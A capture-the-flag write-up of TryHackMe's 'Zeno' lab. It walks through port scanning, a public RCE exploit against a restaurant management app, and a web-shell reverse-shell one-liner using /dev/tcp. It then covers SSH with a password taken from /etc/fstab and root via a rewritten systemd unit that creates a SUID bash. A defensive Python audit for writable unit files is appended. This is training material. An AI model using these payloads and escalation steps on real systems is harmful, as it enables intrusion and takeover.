“The only true wisdom is in knowing you know nothing.” - Socrates

Zeno – Medium

In this writeup we’ll cover a great machine, Zeno, by biniru on TryHackMe.
Room URL: https://tryhackme.com/room/zeno

Summary

  • Nmap and rustscan found the following ports to be open:
    • 22/ssh
    • 12340/http
  • GoBuster with dirb’s big.txt list found a directory rms on port 12340
  • Pathfinder Hotel Restaurant Management System running on port 12340
  • RMS allows unauthenticated RCE: searchsploit restaurant management system
  • Exploited using https://www.exploit-db.com/exploits/47520
  • Found multiple passwords throughout the file system (config.php and /etc/fstab)
  • We were able to SSH as the user edward by using the password found in /etc/fstab.
  • The following was observed for privilege escalation from edward:
    • /etc/systemd/system/zeno-monitoring.service is writable by edward
    • edward can run sudo /usr/sbin/reboot without password
  • Escalation of privileges to root by editing the zeno-monitoring service file and rebooting the system
  • All Done! 😀

Enumeration

  • Nmap and rustscan found that the following ports are open:
    • 22/ssh
    • 12340/http
  • Browsing to port 12340, we came across a ‘404 Not Found’ page
  • Running GoBuster with dirb’s big.txt list, we found that there is a directory ‘rms’
  • Browsing to the ‘rms’ directory, we found an application for ‘Pathfinder Hotel Restaurant Management System’
  • Tried common credentials, no luck
  • Searched for ‘restaurant management system’ on searchsploit:
    • searchsploit restaurant management system
    • We found that the application is vulnerable to RCE

Exploitation

  • We looked inside the exploit to ensure that it targeted the application running on the server:
    • searchsploit -x 47520
  • The exploit had minor formatting issues.
  • Leveraged the exploit to gain RCE on the server.
  • Commands:
    • searchsploit -m 47520
    • Fixed exploit formatting, specifically lines 40, 45 and 70
    • python3 47520.py http://10.10.228.195:12340/rms/
    • The web shell could be accessed using the URL specified in the exploit output:
      • http://{ip}:12340/rms/images/reverse-shell.php
    • We got a reverse shell using the following:
      • nc -nvlp 1234
      • Browsed to http://{ip}:12340/rms/images/reverse-shell.php?cmd=bash+-i+>%26+/dev/tcp/{listenerip}/1234+0>%261

Privilege Escalation - 1

  • We got a shell as the apache user
  • Looking for ways to escalate our privileges, we ran linpeas and observed the following:
    • root DB creds inside /var/www/html/rms/connection/config.php
    • The apache user has write privileges over /etc/systemd/system/zeno-monitoring.service
    • There are credentials for user zeno inside /etc/fstab
    • There is a user called edward in the system
  • We attempted to use the passwords obtained against the user edward
    • By using the one found in /etc/fstab we were able to SSH as edward
  • Once logged in as edward, we were able to read the user.txt file.
  • Looking for further privilege escalation, we found that edward can run sudo /usr/sbin/reboot without a password.

Privilege Escalation - 2

  • Combining the write privileges over the zeno-monitoring service file with the reboot privileges, we were able to spawn a root shell.
  • Procedure:
    • Edited the /etc/systemd/system/zeno-monitoring.service file to have the following contents:

      [Unit]
      Description=Zeno monitoring

      [Service]
      Type=simple
      User=root
      ExecStart=/bin/bash -c 'cp /bin/bash /home/edward/root_shell; chmod +xs /home/edward/root_shell'

      [Install]
      WantedBy=multi-user.target

    • Once edited, we rebooted the system using sudo /usr/sbin/reboot, hoping that our modification worked.
    • Once the system was back up, we were able to spawn a root shell using: /home/edward/root_shell -p
    • All Done! 😀
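The root cause on this box is a unit file that a low-privileged account can rewrite. As an added defender-side check (not part of the original writeup or of the room), here is a small Python audit that lists .service files a user other than the trusted owner could edit and reports which account each service would run as once a rewritten unit starts. The directory list in UNIT_DIRS is an assumption about a standard systemd layout, and the sample units in build_sample_units are constructed for the demo.

```python
import stat
import tempfile
import configparser
from pathlib import Path
# Assumed standard locations systemd loads unit files from.
UNIT_DIRS = ("/etc/systemd/system", "/usr/lib/systemd/system", "/lib/systemd/system")

def unit_runs_as(path):
    """User= from the unit's [Service] section; systemd defaults to root when unset."""
    parser = configparser.ConfigParser(strict=False, interpolation=None)
    parser.optionxform = str  # keep key case (User, ExecStart)
    try:
        parser.read(path)
    except configparser.Error:
        return "root"  # unparseable unit: report systemd's default account
    return parser.get("Service", "User", fallback="root")

def find_weak_units(directories=UNIT_DIRS, trusted_uid=0):
    """List *.service files someone other than trusted_uid could rewrite, with the run-as account."""
    findings = []
    for directory in directories:
        base = Path(directory)
        if not base.is_dir():
            continue
        for path in sorted(base.rglob("*.service")):
            if not path.is_file():  # skips masked units (symlinks to /dev/null)
                continue
            st = path.stat()  # follows symlinks: the real file's mode and owner matter
            reasons = []
            if st.st_mode & (stat.S_IWGRP | stat.S_IWOTH):
                reasons.append("group/other-writable (mode %o)" % stat.S_IMODE(st.st_mode))
            if st.st_uid != trusted_uid:
                reasons.append("owned by uid %d, not %d" % (st.st_uid, trusted_uid))
            if reasons:
                findings.append({"path": str(path), "reasons": reasons, "runs_as": unit_runs_as(path)})
    return findings

def build_sample_units():
    """Constructed fixture: one world-writable unit (as on Zeno) and one sane unit."""
    d = Path(tempfile.mkdtemp(prefix="unit-audit-"))
    weak = d / "zeno-monitoring.service"
    weak.write_text("[Unit]\nDescription=Zeno monitoring\n\n[Service]\nType=simple\nExecStart=/usr/bin/true\n")
    weak.chmod(0o666)  # the weakness: any local user can rewrite the unit
    sane = d / "sane-example.service"
    sane.write_text("[Service]\nUser=nobody\nExecStart=/usr/bin/true\n")
    sane.chmod(0o644)
    return d

def demo():
    """Audit the fixture, treating the fixture's own owner as the trusted uid."""
    d = build_sample_units()
    return find_weak_units([d], trusted_uid=d.stat().st_uid)
```

Running find_weak_units() with no arguments audits the live system; any hit that runs as root and sits next to a sudo rule for reboot or systemctl is exactly the combination used on this machine.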


Hope you enjoyed reading this writeup.
Happy Hunting!

Posted by: infinity
